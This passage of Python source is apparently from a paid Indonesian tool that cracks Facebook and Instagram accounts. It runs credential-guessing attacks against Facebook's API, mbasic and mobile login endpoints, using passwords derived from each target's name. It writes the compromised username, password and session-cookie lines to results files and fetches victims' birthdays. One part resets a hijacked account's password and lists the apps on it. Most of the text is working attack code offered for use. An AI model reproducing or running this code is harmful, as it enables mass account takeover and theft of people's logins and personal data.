for x in response("input"):
if x.get("name") in but:
dat.update({x.get("name"):x.get("value")})
ubahPw=session.post(url_mb+link2.get("action"),data=dat).text
resUbah=BeautifulSoup(ubahPw,"html.parser")
link3=resUbah.find("form",{"method":"post"})
but2=["submit[Next]","nh","fb_dtsg","jazoest"]
if "Buat Kata Sandi Baru" in re.findall("\<title>(.*?)<\/title>",str(ubahPw)):
for b in resUbah("input"):
if b.get("name") in but2:
dat2.update({b.get("name"):b.get("value")})
dat2.update({"password_new":"".join(mmk)})
an=session.post(url_mb+link3.get("action"),data=dat2)
coki = (";").join([ "%s=%s" % (key, value) for key, value in session.cookies.get_dict().items() ])
print(f"\r {N}[{H}✓{N}] berhasil mengubah password menjadi:\n {N}[{H}✓{N}]{H} {user}|{''.join(mmk)}|{coki}{N}")
open('results/TAB-YES.txt', 'a').write(f" [✓] {user}|{''.join(mmk)}|{coki}\n")
cek_apk(session,coki)
def cek_apk(session,cookie):
w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=active",cookies={"cookie":cookie}).text
sop = BeautifulSoup(w,"html.parser")
x = sop.find("form",method="post")
game = [i.text for i in x.find_all("h3")]
if len(game)==0:
print(f"\n {N}[{M}!{N}] opshh tidak ada aplikasi aktif di akun ini.")
else:
for i in range(len(game)):
print(" %s%s. %s%s"%(H,i+1,game[i].replace("Ditambahkan pada"," Ditambahkan pada"),N))
w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactive",cookies={"cookie":cookie}).text
sop = BeautifulSoup(w,"html.parser")
x = sop.find("form",method="post")
game = [i.text for i in x.find_all("h3")]
if len(game)==0:
print(f"\n {N}[{M}!{N}] opshh tidak ada aplikasi kadaluarsa di akun ini.")
else:
for i in range(len(game)):
print(" %s%s. %s%s"%(K,i+1,game[i].replace("Kedaluwarsa"," Kedaluwarsa"),N))
def cok():
os.system("clear")
print("%s[*] ADMIN TIDAK BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TOOLS INI"%(N))
print("[*] UNTUK MENDAPATKAN COOKIES GUNAKAN TOOLS COOKIEDOUGH EKSTENSION YANG ADA DI KIWI BROWSER (%sdownload browser kiwi di play store%s)"%(H,N))
print("[*] JIKA TIDAK MENGERTI MENGGUNAKAN TOOLS SILAHKAN HUBUNGI ADMIN DENGAN KETIK '%sADMIN%s'"%(H,N))
print("[*] JIKA INGIN MENGGUNAKAN FREE USER SILAHKAN HUBUNGI ADMIN UNTUK MENDAPATKAN API KEY GERATIS (%s1 day%s)"%(H,N))
print("[*] (ADMIN IS NOT RESPONSIBLE FOR ABUSE OF THIS TOOL)")
print("[*] SCRIPT TELAH DI UPATE PADA TANGGAL [Sabtu 27 November 2021]")
memek = input("\n[*] masukan api key kamu : ")
if memek == '':
print("\n[!] jangan kosong bro");time.sleep(2);cok()
elif memek in['admin','Admin','ADMIN']:
jalan("\n %s* %sAnda akan di alihkan ke whatsapp..."%(O,H));time.sleep(0.02)
exit(subprocess.Popen(["am","start","https://wa.me/"+requests.get("https://ymbf.yayanxd.my.id/no.txt").text.strip()+"?text=Hello! saya ingin menggunakan tools Brute"],stderr=subprocess.PIPE,stdin=subprocess.PIPE,stdout=subprocess.PIPE).wait())
elif memek in['beli','Beli','BELI']:
beli_key()
try:
kontol = requests.get("https://ymbf.yayanxd.my.id/chek.php?project=ngetes&apikey="+memek).json()
kadaluarsa = kontol['expired']
nama = kontol["username"]
day,month,year = kadaluarsa.split(" ")
month = bulan_key[month]
open('license.txt', 'w').write(memek)
jalan("\n[%s*%s] Hallo %s%s%s apikey anda masih berlaku sampai tanggal: %s%s %s %s%s, silahkan gunakan dengan bijak."%(O,N,H,nama,N,H,day,month,year,N));time.sleep(3)
exit("[%s!%s] jalankan ulang perintah nya dengan ketik python run.py"%(M,N))
except KeyError:
print("\n%s[%s!%s] api key %s%s%s tidak terdaftar di website"%(N,M,N,M,memek,N));time.sleep(2);cok()
def get_license(integer):
lis = list("abcdefghijklmnopqrstuvwxyz123456789")
gets = [random.choice(lis) for _ in range(integer)]
return "".join(gets).upper()
def beli_key():
os.system("clear")
digit = random.choice([20])
digit = get_license(digit)
logo()
print("\n [%s+%s] Your key : %s%s%s"%(O,N,H,digit,N))
print("""\n [%s1%s].%s Daftar premium key%s\n [%s2%s].%s Check harga premium%s\n [%s0%s].%s Exit%s"""%(H,N,O,N,H,N,O,N,M,N,M,N))
print("%s---------------------------%s>%s>%s>"%(B,M,K,H))
pil = input(" %s[%s+%s] choose %s:%s "%(N,O,N,M,H))
while pil == "":
print("\n %s[%s×%s] jangan kosong bro"%(N,M,N));time.sleep(2);beli_key()
if pil == "1":
print ("\n %s[%s!%s] Notice me: mana hari isi dengan angka jangan hurup\n"%(N,M,N))
hari = input(" %s[%s?%s] mau order berapa hari %s:%s "%(N,M,N,M,H))
nama = input(" %s[%s?%s] nama anda %s:%s "%(N,M,N,M,H))
mail = input(" %s[%s?%s] email anda %s:%s "%(N,M,N,M,H))
exit(subprocess.Popen(["am","start","https://wa.me/"+requests.get("https://ymbf.yayanxd.my.id/no.txt").text.strip()+"?text=hello admin! tolong konfirmasi kode premium saya.\n* Nama : "+nama+"\n* EMAIL : "+mail+"\n* KEY : " +digit+"\n* ORDER : "+hari+"days"],stderr=subprocess.PIPE,stdin=subprocess.PIPE,stdout=subprocess.PIPE).wait())
elif pil == "2":
cek_harga()
elif pil == "0":
cok()
else:
print("\n %s[%s×%s] input yang bener"%(N,M,N));time.sleep(2);beli_key()
def cek_harga():
print ("""
%s*%s daftar harga Lisensi %s*%s\n
%s>%s pembayaran via dana/pulsa %s<%s\n
[%s1%s]%s 5K (5 rb) Sehari%s
[%s2%s]%s 25K (25 rb) minggu%s
[%s3%s]%s 50K (50 rb) 1 bulan%s"""%(O,N,O,N,H,N,H,N,O,N,H,N,O,N,H,N,O,N,H,N))
input("\n %s[%s ENTER %s]%s "%(H,O,H,N));beli_key()
class __crack__:
def __init__(self):
self.id = []
def plerr(self,id):
self.id = id
print(' [%s+%s] total id -> %s%s%s' %(O,N,M,len(self.id),N))
___yayanganteng___ = input(' [%s?%s] apakah anda ingin menggunakan kata sandi manual? [Y/t]: '%(O,N))
if ___yayanganteng___ in ('Y', 'y'):
print('\n %s[%s!%s] gunakan , (koma) untuk pemisah contoh : sandi123,sandi12345,dll. setiap kata minimal 6 karakter atau lebih'%(N,M,N))
while True:
pwek = input('\n [%s?%s] masukan kata sandi : '%(O,N))
print(' [*] crack dengan sandi -> [ %s%s%s ]' % (M, pwek, N))
if pwek == '':
print('\n %s[%s×%s] jangan kosong bro kata sandi nya'%(N,M,N))
elif len(pwek)<=5:
print('\n %s[%s×%s] kata sandi minimal 6 karakter'%(N,M,N))
else:
def __yan__(ysc=None): # ycs => Yayan sayang Cindy:3
cin = input('\n [*] method : ')
if cin == '':
print('\n %s[%s×%s] jangan kosong bro'%(N,M,N));__yan__()
elif cin == '1':
print('\n [%s+%s] hasil OK disimpan ke -> results/OK-%s-%s-%s.txt'%(O,N,ha, op, ta))
print(' [%s+%s] hasil CP disimpan ke -> results/CP-%s-%s-%s.txt'%(O,N,ha, op, ta))
print('\n [%s!%s] anda bisa mematikan data selular untuk menjeda proses crack\n'%(M,N))
with YayanGanteng(max_workers=30) as (__yayanXD__):
for ikeh in self.id:
try:
kimochi = ikeh.split('<=>')[0]
__yayanXD__.submit(self.__api__, kimochi, ysc)
except: pass
hasil(ok,cp)
elif cin == '2':
print('\n [%s+%s] hasil OK disimpan ke -> results/OK-%s-%s-%s.txt'%(O,N,ha, op, ta))
print(' [%s+%s] hasil CP disimpan ke -> results/CP-%s-%s-%s.txt'%(O,N,ha, op, ta))
print('\n [%s!%s] anda bisa mematikan data selular untuk menjeda proses crack\n'%(M,N))
with YayanGanteng(max_workers=30) as (__yayanXD__):
for ikeh in self.id:
try:
kimochi = ikeh.split('<=>')[0]
__yayanXD__.submit(self.__mbasic__, kimochi, ysc)
except: pass
hasil(ok,cp)
elif cin == '3':
print('\n [%s+%s] hasil OK disimpan ke -> results/OK-%s-%s-%s.txt'%(O,N,ha, op, ta))
print(' [%s+%s] hasil CP disimpan ke -> results/CP-%s-%s-%s.txt'%(O,N,ha, op, ta))
print('\n [%s!%s] anda bisa mematikan data selular untuk menjeda proses crack\n'%(M,N))
with YayanGanteng(max_workers=30) as (__yayanXD__):
for ikeh in self.id:
try:
kimochi = ikeh.split('<=>')[0]
__yayanXD__.submit(self.__mfb__, kimochi, ysc)
except: pass
hasil(ok,cp)
else:
print('\n %s[%s×%s] input yang bener'%(N,M,N));__yan__()
print('\n [ pilih method login - silahkan coba satu² ]\n')
print(' [%s1%s]. method API (fast)'%(O,N))
print(' [%s2%s]. method mbasic (slow)'%(O,N))
print(' [%s3%s]. method mobile (super slow)'%(O,N))
__yan__(pwek.split(','))
break
elif ___yayanganteng___ in ('T', 't'):
print('\n [ pilih method login - silahkan coba satu² ]\n')
print(' [%s1%s]. method API (fast)'%(O,N))
print(' [%s2%s]. method mbasic (slow)'%(O,N))
print(' [%s3%s]. method mobile (super slow)'%(O,N))
self.__pler__()
else:
print('\n %s[%s×%s] y/t goblok!'%(N,M,N));self.plerr(id)
def __api__(self, user, __yan__):
global ok,cp,loop
for i in list('\|-/'):
sys.stdout.write('\r [%s%s%s] [crack] %s/%s -> OK-:%s - CP-:%s '%(O,i,N,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in __yan__:
pw = pw.lower()
try: os.mkdir('results')
except: pass
try:
_kontol = open('YNTKTS.txt', 'r').read()
except (KeyError, IOError):
_kontol = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": _kontol, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': user, 'locale': 'en_US', 'password': pw, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
response = requests.get(api, params=params, headers=headers_)
if 'Anda Tidak Dapat Menggunakan Fitur Ini Sekarang' in response.text:
sys.stdout.write('\r %s[%s!%s] Hidupkan mode pesawat 2 detik '%(N,M,N)),
loop+=1
sys.stdout.flush()
self.__api__()
if 'session_key' in response.text and 'EAAA' in response.text:
coki = ";".join(i["name"]+"="+i["value"] for i in send.json()["session_cookies"])
print('\r %s* --> %s|%s|%s %s' % (H,user,pw,coki,N))
wrt = ' [✓] %s|%s|%s' % (user,pw,coki)
ok.append(wrt)
open('results/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
elif 'www.facebook.com' in response.json()['error_msg']:
try:
kontol = open('.token.txt').read()
cp_ttl = requests.get('https://graph.facebook.com/%s?fields=birthday&access_token=%s'%(user,kontol)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = bulan_ttl[month]
print('\r %s* --> %s|%s|%s %s %s %s' % (K,user,pw,day,month,year,N))
wrt = ' [×] %s|%s|%s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
print('\r %s* --> %s|%s %s' % (K,user,pw,N))
wrt = ' [×] %s|%s' % (user,pw)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
else:
continue
loop += 1
def __mbasic__(self, user, __yan__):
global ok,cp,loop
for i in list('\|-/'):
sys.stdout.write('\r [%s%s%s] [crack] %s/%s -> OK-:%s - CP-:%s '%(O,i,N,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in __yan__:
pw = pw.lower()
try: os.mkdir('results')
except: pass
try:
_kontol = open('YNTKTS.txt', 'r').read()
except (KeyError, IOError):
_kontol = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ses = requests.Session()
ses.headers.update({"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":_kontol,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://mbasic.facebook.com")
b = ses.post("https://mbasic.facebook.com/login.php", data={"email": user, "pass": pw, "login": "submit"})
if 'c_user' in ses.cookies.get_dict().keys():
coki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print('\r %s* --> %s|%s|%s %s' % (H,user,pw,coki,N))
wrt = ' [✓] %s|%s|%s' % (user,pw,coki)
ok.append(wrt)
open('results/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
kontol = open('.token.txt').read()
cp_ttl = requests.get('https://graph.facebook.com/%s?fields=birthday&access_token=%s'%(user,kontol)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = bulan_ttl[month]
print('\r %s* --> %s|%s|%s %s %s %s' % (K,user,pw,day,month,year,N))
wrt = ' [×] %s|%s|%s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
print('\r %s* --> %s|%s %s' % (K,user,pw,N))
wrt = ' [×] %s|%s' % (user,pw)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
else:
continue
loop += 1
def __mfb__(self, user, __yan__):
global ok,cp,loop
for i in list('\|-/'):
sys.stdout.write('\r [%s%s%s] [crack] %s/%s -> OK-:%s - CP-:%s '%(O,i,N,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in __yan__:
pw = pw.lower()
try: os.mkdir('results')
except: pass
try:
_kontol = open('YNTKTS.txt', 'r').read()
except (KeyError, IOError):
_kontol = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ses = requests.Session()
ses.headers.update({"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":_kontol,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://m.facebook.com")
b = ses.post("https://m.facebook.com/login.php", data={"email": user, "pass": pw, "login": "submit"})
if 'c_user' in ses.cookies.get_dict().keys():
coki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print('\r %s* --> %s|%s|%s %s' % (H,user,pw,coki,N))
wrt = ' [✓] %s|%s|%s' % (user,pw,coki)
ok.append(wrt)
open('results/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
kontol = open('.token.txt').read()
cp_ttl = requests.get('https://graph.facebook.com/%s?fields=birthday&access_token=%s'%(user,kontol)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = bulan_ttl[month]
print('\r %s* --> %s|%s|%s %s %s %s' % (K,user,pw,day,month,year,N))
wrt = ' [×] %s|%s|%s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
print('\r %s* --> %s|%s %s' % (K,user,pw,N))
wrt = ' [×] %s|%s' % (user,pw)
cp.append(wrt)
open('results/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
else:
continue
loop += 1
def __pler__(self):
yan = input('\n [*] method : ')
if yan == '':
print('\n %s[%s×%s] jangan kosong bro'%(N,M,N));self.__pler__()
elif yan in ('1', '01'):
print('\n [%s+%s] hasil OK disimpan ke -> results/OK-%s-%s-%s.txt'%(O,N,ha, op, ta))
print(' [%s+%s] hasil CP disimpan ke -> results/CP-%s-%s-%s.txt'%(O,N,ha, op, ta))
print('\n [%s!%s] anda bisa mematikan data selular untuk menjeda proses crack\n'%(M,N))
with YayanGanteng(max_workers=30) as kirim:
for yntkts in self.id: # Yo Ndak Tau Kok Tanya Saia
try:
uid, name = yntkts.split('<=>')
xz = name.split(' ')
if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
else:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
kirim.submit(self.__api__, uid, pwx)
except:
pass
hasil(ok,cp)
elif yan in ('2', '02'):
print('\n [%s+%s] hasil OK disimpan ke -> results/OK-%s-%s-%s.txt'%(O,N,ha, op, ta))
print(' [%s+%s] hasil CP disimpan ke -> results/CP-%s-%s-%s.txt'%(O,N,ha, op, ta))
print('\n [%s!%s] anda bisa mematikan data selular untuk menjeda proses crack\n'%(M,N))
with YayanGanteng(max_workers=30) as kirim:
for yntkts in self.id: # Yo Ndak Tau Kok Tanya Saia
try:
uid, name = yntkts.split('<=>')
xz = name.split(' ')
if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
else:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
kirim.submit(self.__mbasic__, uid, pwx)
except:
pass
hasil(ok,cp)
elif yan in ('3', '03'):
print('\n [%s+%s] hasil OK disimpan ke -> results/OK-%s-%s-%s.txt'%(O,N,ha, op, ta))
print(' [%s+%s] hasil CP disimpan ke -> results/CP-%s-%s-%s.txt'%(O,N,ha, op, ta))
print('\n [%s!%s] anda bisa mematikan data selular untuk menjeda proses crack\n'%(M,N))
with YayanGanteng(max_workers=30) as kirim:
for yntkts in self.id: # Yo Ndak Tau Kok Tanya Saia
try:
uid, name = yntkts.split('<=>')
xz = name.split(' ')
if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
else:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
kirim.submit(self.__mfb__, uid, pwx)
except:
pass
hasil(ok,cp)
else:
print('\n %s[%s×%s] input yang bener'%(N,M,N));self.__pler__()
yan, status_foll, poll, cr, looping = [], [], [], [], 1
url_instagram = "https://www.instagram.com/"
user_agentz = "Mozilla/5.0 (Linux; Android 11; RMX3191) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36"
user_agentz_api = "Mozilla/5.0 (Linux; Android 10; SM-G973F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36 Instagram 166.1.0.42.245 Android (29/10; 420dpi; 1080x2042; samsung; SM-G973F; beyond1; exynos9820; en_GB; 256099204)"
user_agentz_qu = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0", "Mozilla/5.0 (Linux; Android 10; SM-G973F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36 Instagram 166.1.0.42.245 Android (29/10; 420dpi; 1080x2042; samsung; SM-G973F; beyond1; exynos9820; en_GB; 256099204)"]
urll = "https://www.instagram.com/"
url = "https://www.instagram.com/accounts/login/ajax/"
headerz = {"User-Agent": user_agentz}
headerz_api = {"User-Agent": user_agentz_api}
header = {}
param = {}
def proses():
print('\n\n %s[%s+%s] hasil OK disimpan ke -> results/IG-OK-%s-%s-%s.txt'%(N,O,N,ha, op, ta));time.sleep(0.2)
print(' [%s+%s] hasil CP disimpan ke -> results/IG-CP-%s-%s-%s.txt'%(O,N,ha, op, ta));time.sleep(0.2)
print('\n [%s!%s] tekan ctrl+z di keyboard anda untuk menjeda proses crack\n'%(M,N));time.sleep(0.2)
def log_igeh():
global cookie
try:
kontol = open("ig.txt", "r").read()
except IOError:
masuk_ig()
else:
url = "https://i.instagram.com/api/v1/friendships/39431798677/followers/?count=5"
with requests.Session() as ses:
try:
otw = ses.get(url, cookies={"cookie": kontol}, headers=headerz_api)
if "users" in json.loads(otw.content):
cookie = {"cookie": kontol}
else:
print('\n %s[%s×%s] cookie invalid'%(N,M,N));time.sleep(2);os.system('rm -rf ig.txt');masuk_ig()
except ValueError:
print('\n %s[%s×%s] cookie invalid'%(N,M,N));time.sleep(2);os.system('rm -rf ig.txt');masuk_ig()
def masuk_ig():
global cookie
jalan("\n %s[%s+%s] Login menggunakan akun tumbal Instagram anda [%s+%s]"%(N,H,N,H,N))
print(" [+]----------------------------------------------[+]");time.sleep(0.03)
userr = input(' [%s?%s] username :%s '%(H,N,K))
peweh = input('%s [%s?%s] password :%s '%(N,H,N,K))
try:
try:
headerz = {"User-Agent": user_agentz}
with requests.Session() as ses:
scr = "https://www.instagram.com/"
data = ses.get(scr, headers=headerz).content
toket = re.findall('{"config":{"csrf_token":"(.*)","viewer"', str(data))[0]
headerss = {"Accept": "*/*","Accept-Encoding": "gzip, deflate, br","Accept-Language": "en-US,en;q=0.5","Host": "www.instagram.com","X-CSRFToken": toket,"X-Requested-With": "XMLHttpRequest","Referer": "https://www.instagram.com/accounts/login/","User-Agent": user_agentz,}
param = {"username": userr,"enc_password": "#PWD_INSTAGRAM_BROWSER:0:{}:{}".format(random.randint(1000000000, 9999999999), peweh),"optIntoOneTap": False,"queryParams": {},"stopDeletionNonce": "","trustedDeviceRecords": {}
}
except:
header = {}
param = {}
pass
with requests.Session() as ses:
url = "https://www.instagram.com/accounts/login/ajax/"
respon = ses.post(url, data=param, headers=headerss)
data = json.loads(respon.content)
_2 = respon.cookies.get_dict()
if "userId" in str(data):
for xxx in _2:
with open("ig.txt", "a") as simpan:
simpan.write(xxx+"="+_2[xxx]+";")
masuk = open("ig.txt","r").read()
cookie = {"ig.txt": masuk}
jalan("\n %s[%s*%s] selamat cookies kamu valid"%(N,O,N));time.sleep(2)
exit(" [%s!%s] jalankan ulang perintah nya dengan ketik python run.py"%(M,N))
elif "checkpoint_url" in str(data):